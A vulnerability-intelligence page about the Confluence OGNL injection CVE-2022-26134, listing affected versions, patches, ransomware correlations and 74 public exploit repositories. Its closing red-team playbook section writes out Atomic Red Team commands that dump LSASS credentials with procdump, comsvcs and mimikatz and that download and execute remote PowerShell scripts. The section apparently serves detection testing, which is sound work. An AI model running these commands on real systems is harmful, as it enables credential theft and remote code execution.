CVE-2022-26134
Overview
This vulnerability is an OGNL (Object-Graph Navigation Language) injection affecting Atlassian Confluence Server and Data Center components. The root cause is improper input validation in the web application, allowing malicious OGNL expressions to be injected and evaluated within the server's execution context. The flaw resides in specific versions of Confluence, enabling unauthenticated access to this injection vector via HTTP requests.
Vulnerability Description
In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance. The affected versions are from 1.3.0 before 7.4.17, from 7.13.0 before 7.13.7, from 7.14.0 before 7.14.3, from 7.15.0 before 7.15.2, from 7.16.0 before 7.16.4, from 7.17.0 before 7.17.4, and from 7.18.0 before 7.18.1.
Impact
An unauthenticated attacker can execute arbitrary code on vulnerable Confluence Server or Data Center instances, gaining full control over the affected system. This enables unauthorized access to sensitive data, installation of malware, or disruption of services. No user interaction or authentication is required, allowing remote exploitation from the internet. The resulting compromise can lead to data breaches, lateral movement within networks, and complete system takeover, severely impacting business operations.
Solution
Atlassian has released security updates addressing this vulnerability in Confluence Server and Data Center versions 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4, and 7.18.1. Administrators should apply these patches immediately. Detailed patch instructions and advisory information are available at Atlassian's official security advisory page: https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html. No official workarounds are recommended beyond applying the updates.
EPSS vs KEV Prediction — Evolution (30 days)
Ransomware Intelligence
Correlated Groups
Correlations are established through analysis of shared tools, tactics, and infrastructure between threat groups and vulnerabilities. They do not represent direct confirmation of exploitation.
| Group | Confidence | Victims | Source |
|---|---|---|---|
|
Lilac Typhoon
|
MEDIUM | — | correlation_misp |
Predictions
Predictions are based on analysis of past ransomware group behaviors and their predilection for specific vulnerability characteristics, such as vendor, product, and flaw type.
The groups below are predictions based on historical exploitation patterns of the same vendor/product. These are not confirmations.
Full Analysis
An OGNL injection vulnerability has been identified in specific versions of Confluence Server and Data Center, which allows an unauthenticated attacker to execute arbitrary code on the affected instances. This vulnerability arises from improper handling of user input, specifically within the Object-Graph Navigation Language (OGNL) used by the application. By crafting a malicious request that exploits this flaw, an attacker can manipulate the OGNL expressions to execute arbitrary commands on the server. The affected versions span a range from 1.3.0 to various releases in the 7.x series, indicating a significant window of exposure for organizations using these products.
The attack vectors for this vulnerability are particularly concerning due to the lack of authentication requirements. An attacker can exploit this flaw remotely, making it accessible to anyone with network access to the Confluence instance. For instance, an attacker could send specially crafted HTTP requests that include malicious OGNL expressions. Once executed, these commands could lead to unauthorized access to sensitive data, modification of application behavior, or even complete system compromise. The simplicity of the attack, combined with the high potential for damage, underscores the critical nature of this vulnerability.
The real-world impact of this vulnerability can be severe, particularly for organizations that rely on Confluence for collaboration and documentation. Successful exploitation could lead to data breaches, loss of intellectual property, or disruption of business operations. The ability for an attacker to execute arbitrary code means they could deploy malware, exfiltrate sensitive information, or pivot to other systems within the network. The financial implications of such incidents can be substantial, including costs associated with incident response, legal ramifications, and reputational damage. Organizations that fail to address this vulnerability may find themselves facing regulatory scrutiny, especially if sensitive data is compromised.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. First, it is essential to ensure that all instances of Confluence Server and Data Center are updated to the latest versions, as patches have been released to address this issue. Regular vulnerability assessments and penetration testing should be conducted to identify any potential exploitation attempts. Additionally, organizations should employ web application firewalls (WAFs) to filter and monitor HTTP requests for malicious patterns associated with OGNL injection. Implementing strict access controls and network segmentation can also help limit exposure and reduce the attack surface.
In conclusion, the OGNL injection vulnerability in Confluence Server and Data Center presents a significant threat to organizations using these products. The ease of exploitation, coupled with the potential for severe consequences, necessitates immediate action to mitigate risks. By staying informed about vulnerabilities, maintaining up-to-date software, and employing robust security measures, organizations can protect themselves against this and similar threats in the future. The proactive management of vulnerabilities is crucial in today’s cybersecurity landscape, where the cost of inaction can far exceed the investment in preventive measures.
CSURFACE threat intelligence has detected a slight increase in exploitation attempts targeting CVE-2022-26134, reflecting a modest upward trend in attacker activity. This subtle rise, while not indicative of a rapid escalation, underscores the persistent interest threat actors maintain in leveraging this critical vulnerability. Notably, the continued availability of multiple new proof-of-concept exploits on public platforms facilitates easier weaponization, lowering the barrier for less sophisticated adversaries to conduct attacks. The association of this vulnerability with known ransomware groups, including Lilac Typhoon, remains a significant concern, as it highlights ongoing use in ransomware campaigns. Although the Exploit Prediction Scoring System (EPSS) score remains high and stable, the incremental increase in exploitation attempts signals that defenders should remain vigilant. Overall, the threat level continues to be critical due to the vulnerability’s ease of exploitation and its proven utility in ransomware operations, but the current activity pattern suggests a steady, persistent threat rather than an immediate surge.
Affected Products (14)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Atlassian | Confluence Data Center | All |
cpe:2.3:a:atlassian:confluence_data_center:*:*:*:*:*:*:*:*
|
|
|
Atlassian | Confluence Data Center | All |
cpe:2.3:a:atlassian:confluence_data_center:*:*:*:*:*:*:*:*
|
|
|
Atlassian | Confluence Data Center | All |
cpe:2.3:a:atlassian:confluence_data_center:*:*:*:*:*:*:*:*
|
|
|
Atlassian | Confluence Data Center | All |
cpe:2.3:a:atlassian:confluence_data_center:*:*:*:*:*:*:*:*
|
|
|
Atlassian | Confluence Data Center | All |
cpe:2.3:a:atlassian:confluence_data_center:*:*:*:*:*:*:*:*
|
|
|
Atlassian | Confluence Data Center | All |
cpe:2.3:a:atlassian:confluence_data_center:*:*:*:*:*:*:*:*
|
|
|
Atlassian | Confluence Data Center | 7.18.0 |
cpe:2.3:a:atlassian:confluence_data_center:7.18.0:*:*:*:*:*:*:*
|
|
|
Atlassian | Confluence Server | All |
cpe:2.3:a:atlassian:confluence_server:*:*:*:*:*:*:*:*
|
|
|
Atlassian | Confluence Server | All |
cpe:2.3:a:atlassian:confluence_server:*:*:*:*:*:*:*:*
|
|
|
Atlassian | Confluence Server | All |
cpe:2.3:a:atlassian:confluence_server:*:*:*:*:*:*:*:*
|
|
|
Atlassian | Confluence Server | All |
cpe:2.3:a:atlassian:confluence_server:*:*:*:*:*:*:*:*
|
|
|
Atlassian | Confluence Server | All |
cpe:2.3:a:atlassian:confluence_server:*:*:*:*:*:*:*:*
|
|
|
Atlassian | Confluence Server | All |
cpe:2.3:a:atlassian:confluence_server:*:*:*:*:*:*:*:*
|
|
|
Atlassian | Confluence Server | 7.18.0 |
cpe:2.3:a:atlassian:confluence_server:7.18.0:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
Atlassian Confluence Namespace OGNL Injection
exploits/multi/http/atlassian_confluence_namespace_ognl_injection
|
Unknown, bturner-r7, jbaines-r7 +1 | Unknown | - | View |
ExploitDB (1)
| Title | Author | Type | Platform | Date | Link |
|---|---|---|---|---|---|
| Confluence Data Center 7.18.0 - Remote Code Execution (RCE) | Fellipe Oliveira | webapps | java | - | View |
GitHub PoCs (74)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
W01fh4cker/Serein
【懒人神器】一款图形化、批量采集url、批量对采集的url进行各种nday检测的工具。可用于src挖掘、cnvd挖掘、0day利用、打造自己的武器库等场景。可以批量利用Actively Exploited Atlassian Conflue...
|
W01fh4cker | 1252 | 187 | 2022-05-31 | View |
|
BeichenDream/CVE-2022-26134-Godzilla-MEMSHELL
|
BeichenDream | 340 | 52 | 2022-06-07 | View |
|
jbaines-r7/through_the_wire
CVE-2022-26134 Proof of Concept
|
jbaines-r7 | 172 | 50 | 2022-06-03 | View |
|
hev0x/CVE-2022-26134
Confluence Pre-Auth Remote Code Execution via OGNL Injection (CVE-2022-26134)
|
hev0x | 44 | 13 | 2022-06-06 | View |
|
crowsec-edtech/CVE-2022-26134
CVE-2022-26134 - Confluence Pre-Auth RCE | OGNL injection
|
crowsec-edtech | 30 | 16 | 2022-06-03 | View |
|
nxtexploit/CVE-2022-26134
Atlassian Confluence (CVE-2022-26134) - Unauthenticated Remote code execution (RCE)
|
nxtexploit | 29 | 13 | 2022-07-05 | View |
|
SNCKER/CVE-2022-26134
[CVE-2022-26134]Confluence OGNL expression injected RCE with sandbox bypass.
|
SNCKER | 27 | 8 | 2022-06-04 | View |
|
SIFalcon/confluencePot
Simple Honeypot for Atlassian Confluence (CVE-2022-26134)
|
SIFalcon | 20 | 3 | 2022-06-06 | View |
|
AmoloHT/CVE-2022-26134
「💥」CVE-2022-26134 - Confluence Pre-Auth RCE
|
AmoloHT | 14 | 4 | 2022-06-19 | View |
|
whokilleddb/CVE-2022-26134-Confluence-RCE
Exploit for CVE-2022-26134: Confluence Pre-Auth Remote Code Execution via OGNL Injection
|
whokilleddb | 13 | 3 | 2022-06-07 | View |
|
iveresk/cve-2022-26134
Just simple PoC for the Atlassian Jira exploit. Provides code execution for unauthorised user on a server.
|
iveresk | 12 | 4 | 2022-07-15 | View |
|
redhuntlabs/ConfluentPwn
Atlassian confluence unauthenticated ONGL injection remote code execution scanner (CVE-2022-26134).
|
redhuntlabs | 12 | 3 | 2022-06-08 | View |
|
abhishekmorla/CVE-2022-26134
|
abhishekmorla | 8 | 4 | 2022-06-05 | View |
|
MaskCyberSecurityTeam/CVE-2022-26134_Behinder_MemShell
|
MaskCyberSecurityTeam | 9 | 0 | 2023-02-04 | View |
|
offlinehoster/CVE-2022-26134
Information and scripts for the confluence CVE-2022-26134
|
offlinehoster | 8 | 1 | 2022-06-03 | View |
|
keven1z/CVE-2022-26134
远程攻击者在Confluence未经身份验证的情况下,可构造OGNL表达式进行注入,实现在Confluence Server或Data Center上执行任意代码,在现有脚本上修改了poc,方便getshell。
|
keven1z | 7 | 0 | 2022-07-23 | View |
|
li8u99/CVE-2022-26134
Atlassian Confluence 远程代码执行漏洞(CVE-2022-26134)
|
li8u99 | 4 | 2 | 2022-06-07 | View |
|
alcaparra/CVE-2022-26134
CVE-2022-26134 Confluence OGNL Injection POC
|
alcaparra | 4 | 2 | 2022-06-07 | View |
|
kyxiaxiang/CVE-2022-26134
|
kyxiaxiang | 3 | 3 | 2022-06-04 | View |
|
BBD-YZZ/Confluence-RCE
confluence rce (CVE-2021-26084, CVE-2022-26134, CVE-2023-22527)
|
BBD-YZZ | 5 | 1 | 2024-05-29 | View |
|
Y000o/Confluence-CVE-2022-26134
|
Y000o | 4 | 2 | 2022-06-07 | View |
|
Vulnmachines/Confluence-CVE-2022-26134
|
Vulnmachines | 3 | 2 | 2022-06-05 | View |
|
cai-niao98/CVE-2022-26134
CVE-2022-26134
|
cai-niao98 | 3 | 2 | 2022-06-09 | View |
|
Chocapikk/CVE-2022-26134
CVE-2022-26134 - Pre-Auth Remote Code Execution via OGNL Injection
|
Chocapikk | 4 | 1 | 2022-06-13 | View |
|
archanchoudhury/Confluence-CVE-2022-26134
This repository talks about Zero-Day Exploitation of Atlassian Confluence, it's defense and analysis point of view from ...
|
archanchoudhury | 4 | 0 | 2022-06-06 | View |
|
KeepWannabe/BotCon
[CVE-2022-26134] Attlasian Confluence RCE
|
KeepWannabe | 3 | 1 | 2022-06-10 | View |
|
skhalsa-sigsci/CVE-2022-26134-LAB
Detecting CVE-2022-26134 using Nuclei
|
skhalsa-sigsci | 3 | 1 | 2022-10-09 | View |
|
ColdFusionX/CVE-2022-26134
Atlassian Confluence OGNL Injection Remote Code Execution (RCE) Vulnerability (CVE-2022-26134)
|
ColdFusionX | 2 | 2 | 2022-06-24 | View |
|
Debajyoti0-0/CVE-2022-26134
Atlassian Confluence (CVE-2022-26134) - Unauthenticated OGNL injection vulnerability (RCE).
|
Debajyoti0-0 | 3 | 1 | 2022-07-05 | View |
|
CatAnnaDev/CVE-2022-26134
|
CatAnnaDev | 3 | 1 | 2022-06-06 | View |
|
kh4sh3i/CVE-2022-26134
[PoC] Atlassian Confluence (CVE-2022-26134) - Unauthenticated OGNL injection vulnerability (RCE)
|
kh4sh3i | 4 | 0 | 2022-06-21 | View |
|
Yuri08loveElaina/CVE-2022-26134
CVE-2022-26134 - Confluence Pre-Auth Remote Code Execution [RCE]
|
Yuri08loveElaina | 3 | 1 | 2025-06-14 | View |
|
Brucetg/CVE-2022-26134
(CVE-2022-26134)an unauthenticated and remote OGNL injection vulnerability resulting in code execution in the context of...
|
Brucetg | 2 | 1 | 2022-06-04 | View |
|
f4yd4-s3c/cve-2022-26134
|
f4yd4-s3c | 2 | 1 | 2022-07-06 | View |
|
twoning/CVE-2022-26134-PoC
CVE-2022-26134-PoC
|
twoning | 2 | 1 | 2022-07-14 | View |
|
shiftsansan/CVE-2022-26134-Console
CVE-2022-26134-Console
|
shiftsansan | 0 | 3 | 2022-08-22 | View |
|
shamo0/CVE-2022-26134
Confluence Server and Data Center - CVE-2022-26134 - Critical severity unauthenticated remote code execution vulnerabili...
|
shamo0 | 1 | 2 | 2022-06-04 | View |
|
cbk914/CVE-2022-26134_check
|
cbk914 | 3 | 0 | 2023-01-15 | View |
|
coskper-papa/CVE-2022-26134
confluence rce
|
coskper-papa | 1 | 2 | 2022-07-08 | View |
|
p4b3l1t0/confusploit
This is a python script that can be used with Shodan CLI to mass hunting Confluence Servers vulnerable to CVE-2022-26134
|
p4b3l1t0 | 2 | 0 | 2022-07-12 | View |
|
b4dboy17/CVE-2022-26134
|
b4dboy17 | 2 | 0 | 2022-10-24 | View |
|
0xAgun/CVE-2022-26134
|
0xAgun | 1 | 1 | 2022-06-05 | View |
|
kailing0220/CVE-2022-26134
在受影响的Confluence Server 和Data Center 版本中,存在一个OGNL 注入漏洞,该漏洞允许未经身份验证的攻击者在Confluence Server 或Data Center 服务器上执行任意代码。
|
kailing0220 | 1 | 1 | 2022-10-15 | View |
|
ma1am/CVE-2022-26134-Exploit-Detection
This repository contains Yara rule and the method that a security investigator may want to use for CVE-2022-26134 threat...
|
ma1am | 1 | 0 | 2022-06-03 | View |
|
axingde/CVE-2022-26134
Atlassian confluence poc
|
axingde | 1 | 0 | 2022-06-05 | View |
|
reubensammut/cve-2022-26134
Implementation of CVE-2022-26134
|
reubensammut | 1 | 0 | 2022-06-07 | View |
|
Habib0x0/CVE-2022-26134
Atlassian Confluence- Unauthenticated OGNL injection vulnerability (RCE)
|
Habib0x0 | 1 | 0 | 2022-06-07 | View |
|
r1skkam/TryHackMe-Atlassian-CVE-2022-26134
Atlassian, CVE-2022-26134 An interactive lab showcasing the Confluence Server and Data Center un-authenticated RCE vuln...
|
r1skkam | 1 | 0 | 2022-07-04 | View |
|
1337in/CVE-2022-26134web
CVE-2022-26134 web payload
|
1337in | 1 | 0 | 2022-08-26 | View |
|
kelemaoya/CVE-2022-26134
Confluence Server and Data Center存在一个远程代码执行漏洞,未经身份验证的攻击者可以利用该漏洞向目标服务器注入恶意ONGL表达式,进而在目标服务器上执行任意代码。
|
kelemaoya | 1 | 0 | 2022-10-16 | View |
|
CJ-0107/cve-2022-26134
cve-2022-26134
|
CJ-0107 | 1 | 0 | 2022-10-16 | View |
|
404fu/CVE-2022-26134-POC
|
404fu | 1 | 0 | 2024-03-26 | View |
|
acfirthh/CVE-2022-26134
A PoC for CVE-2022-26134 for Educational Purposes and Security Research
|
acfirthh | 1 | 0 | 2023-09-20 | View |
|
secjia/CVE-2022-26134
|
secjia | 0 | 0 | 2022-06-08 | View |
|
roodhelios/CVE-2022-26134-OGNL-Injection
|
roodhelios | 0 | 0 | 2026-05-06 | View |
|
vesperp/CVE-2022-26134-Confluence
|
vesperp | 0 | 0 | 2022-06-07 | View |
|
sunny-kathuria/exploit_CVE-2022-26134
CVE-2022-26134, an OGNL injection vulnerability exists that would allow an unauthenticated attacker to execute arbitrary...
|
sunny-kathuria | 0 | 0 | 2022-06-10 | View |
|
Luchoane/CVE-2022-26134_conFLU
PoC for exploiting CVE-2022-26134 on Confluence
|
Luchoane | 0 | 0 | 2022-06-29 | View |
|
yigexioabai/CVE-2022-26134-cve1
|
yigexioabai | 0 | 0 | 2022-10-15 | View |
|
xanszZZ/ATLASSIAN-Confluence_rce
批量检测CVE-2022-26134 RCE漏洞
|
xanszZZ | 0 | 0 | 2022-10-16 | View |
|
latings/CVE-2022-26134
CVE-2022-26134
|
latings | 0 | 0 | 2022-10-16 | View |
|
yyqxi/CVE-2022-26134
CVE-2022-26134poc
|
yyqxi | 0 | 0 | 2022-10-16 | View |
|
Muhammad-Ali007/Atlassian_CVE-2022-26134
Confluence Pre-Auth Remote Code Execution via OGNL Injection (CVE-2022-26134)
|
Muhammad-Ali007 | 0 | 0 | 2023-07-30 | View |
|
yTxZx/CVE-2022-26134
|
yTxZx | 0 | 0 | 2023-10-20 | View |
|
cc3305/CVE-2022-26134
CVE-2022-26134 exploit script
|
cc3305 | 0 | 0 | 2024-06-07 | View |
|
thetowsif/CVE-2022-26134
Atlassian's Confluence Server and Data Center editions (Vulnerable Version > 7.18.1)
|
thetowsif | 0 | 0 | 2025-06-09 | View |
|
crypt0lith/confluence-ognl-rce
Confluence Unauth RCE (CVE-2022-26134)
|
crypt0lith | 0 | 0 | 2026-02-26 | View |
|
Gilospy/CVE-2022-26134
|
Gilospy | 0 | 0 | 2024-10-13 | View |
|
MAHABUB122003/Atlassian-CVE-2022-26134
|
MAHABUB122003 | 0 | 0 | 2025-06-14 | View |
|
wjlin0/CVE-2022-26134
CVE-2022-26134 GO POC 练习
|
wjlin0 | 0 | 0 | 2022-12-25 | View |
|
Khalidhaimur/CVE-2022-26134
Active Exploitation of Atlassian’s Questions for Confluence App CVE-2022-26134
|
Khalidhaimur | 0 | 0 | 2025-02-12 | View |
|
tpdlshdmlrkfmcla/cve-2022-26134
cve-2022-26134 atlassia Confluence Data Center2016 server OGNL %[...}
|
tpdlshdmlrkfmcla | 0 | 0 | 2025-03-30 | View |
|
DARKSTUFF-LAB/-CVE-2022-26134
|
DARKSTUFF-LAB | 0 | 0 | 2023-12-29 | View |
|
xsxtw/CVE-2022-26134
|
xsxtw | 0 | 0 | 2024-05-02 | View |
Ransomware Groups 1
Threat Feed
35 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Public exploit code is available for this vulnerability
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Deployed role: Linux · Web Server
Kill chain derived from the ML classifier. Pick the target OS above to see the OS-specific path and matching playbook.
Attack Vectors ML
MITRE ATT&CK Techniques (10)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns
No CAPEC pattern mapped to this CVE.
Red Team Playbook
108 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
"#{procdump_exe}" -accepteula -mm lsass.exe #{output_file}
$exePath = resolve-path "$env:ProgramFiles\dotnet\shared\Microsoft.NETCore.App\5*\createdump.exe"
& "$exePath" -u -f $env:Temp\dotnet-lsass.dmp (Get-Process lsass).id
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe --silent-process-exit "#{output_folder}"
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe -w "%temp%\nanodump.dmp"
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
try{ IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1003.001/src/Out-Minidump.ps1') -ErrorAction Stop}
catch{ $_; exit $_.Exception.Response.StatusCode.Value__}
get-process lsass | Out-Minidump
"#{procdump_exe}" -accepteula -ma lsass.exe #{output_file}
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full
"#{dumpert_exe}"
#{xordump_exe} -out #{output_file} -x 0x41
if (Test-Path -Path "$env:SystemRoot\System32\rdrleakdiag.exe") {
$binary_path = "$env:SystemRoot\System32\rdrleakdiag.exe"
} elseif (Test-Path -Path "$env:SystemRoot\SysWOW64\rdrleakdiag.exe") {
$binary_path = "$env:SystemRoot\SysWOW64\rdrleakdiag.exe"
} else {
$binary_path = "File not found"
exit 1
}
$lsass_pid = get-process lsass |select -expand id
if (-not (Test-Path -Path"$env:TEMP\t1003.001-13-rdrleakdiag")) {New-Item -ItemType Directory -Path $env:TEMP\t1003.001-13-rdrleakdiag -Force}
write-host $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
& $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
Write-Host "Minidump file, minidump_$lsass_pid.dmp can be found inside $env:TEMP\t1003.001-13-rdrleakdiag directory."
"#{venv_path}\Scripts\pypykatz" live lsa
#{mimikatz_exe} "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords full" exit
IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
"#{psexec_exe}" #{remote_host} -accepteula -c #{command_path}
cmd.exe /Q /c #{command_to_execute} 1> \\127.0.0.1\ADMIN$\#{output_file} 2>&1
New-PSDrive -name #{map_name} -psprovider filesystem -root \\#{computer_name}\#{share_name}
cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password} /u:#{user_name}"
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
# creating a custom nslookup function that will indeed call nslookup but forces the result to be "whoami"
# this would not be part of a real attack but helpful for this simulation
function nslookup { &"$env:windir\system32\nslookup.exe" @args | Out-Null; @("","whoami")}
powershell .(nslookup -q=txt example.com 8.8.8.8)[-1]
Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'"
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds"
$url='https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr
Add-Content -Path #{ads_file} -Value 'Write-Host "Stream Data Executed"' -Stream 'streamCommand'
$streamcommand = Get-Content -Path #{ads_file} -Stream 'streamcommand'
Invoke-Expression $streamcommand
powershell.exe -e #{obfuscated_code}
# Encoded payload in next command is the following "Set-Content -path "$env:SystemRoot/Temp/art-marker.txt" -value "Hello from the Atomic Red Team""
reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI=" /f
iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))
$malcmdlets = #{Malicious_cmdlets}
foreach ($cmdlets in $malcmdlets) {
"function $cmdlets { Write-Host Pretending to invoke $cmdlets }"}
foreach ($cmdlets in $malcmdlets) {
$cmdlets}
New-PSSession -ComputerName #{hostname_to_connect}
Test-Connection $env:COMPUTERNAME
Set-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use -Value "T1086 PowerShell Session Creation and Use"
Get-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
Remove-Item -Force $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
iex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/d943001a7defb5e0d1657085a77a0e78609be58f/Privesc/PowerUp.ps1 -UseBasicParsing)
Invoke-AllChecks
powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('#{url}');$Xml.command.a.execute | IEX"
C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject('script:#{url}').Exec();close()"
import-module "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1"
try { Invoke-BloodHound -OutputDirectory $env:Temp }
catch { $_; exit $_.Exception.HResult}
Start-Sleep 5
write-host "Remote download of SharpHound.ps1 into memory, followed by execution of the script" -ForegroundColor Cyan
IEX (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1');
Invoke-BloodHound -OutputDirectory $env:Temp
Start-Sleep 5
#{soaphound_path} --user $(#{user})@$(#{domain}) --password #{password} --dc #{dc} --buildcache --cachefilename #{cachefilename}
